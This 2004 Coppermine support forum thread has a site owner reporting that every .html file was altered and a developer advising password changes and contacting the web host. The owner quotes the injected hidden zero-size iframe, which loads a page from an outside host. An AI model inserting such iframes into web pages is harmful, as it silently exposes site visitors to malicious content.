Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: Help - My Coppermine Site Got Hacked!  (Read 3343 times)

0 Members and 1 Guest are viewing this topic.

caplan8293

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Help - My Coppermine Site Got Hacked!
« on: November 15, 2004, 07:03:17 am »
Has anyone ever heard of this?  Someone hacked into my webserving account and edited the template.html's of my 30+ themes and added the line
Code: [Select]
<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe>to each one.  Since there are so many themes, I think it must have been done programatically.  However, how would the hacker or program know only to edit template.html?  None of my other files on my whole website were touched... Any ideas?
Thanks a lot.
Chuck
Logged
caplan8293

caplan8293

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Help - My Coppermine Site Got Hacked!
« Reply #1 on: November 15, 2004, 07:15:43 am »
UPDATE - It is not just a Coppermine thing.  Apparently someone hacked into my site and ran a PERL script to add the above code to all files ending in .html.  That is why all my Coppermine files were affected.  Still, if anyone has any experience with getting hacked this way, I would like to hear about what they did.
Thanks
Logged
caplan8293

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Help - My Coppermine Site Got Hacked!
« Reply #2 on: November 15, 2004, 07:49:14 am »
mostly such intruders get in because the site admin uses a weak password (trivial password, with too few characters). Change your password immediately, and contact your webhost for support, maybe the intruder was using an exploit from an unpatched weakness on the server itself.

You are correct, this is not a coppermine thing at all.

Joachim
Logged
Pages: [1]   Go Up
« previous next »
 

Page created in 0.02 seconds with 19 queries.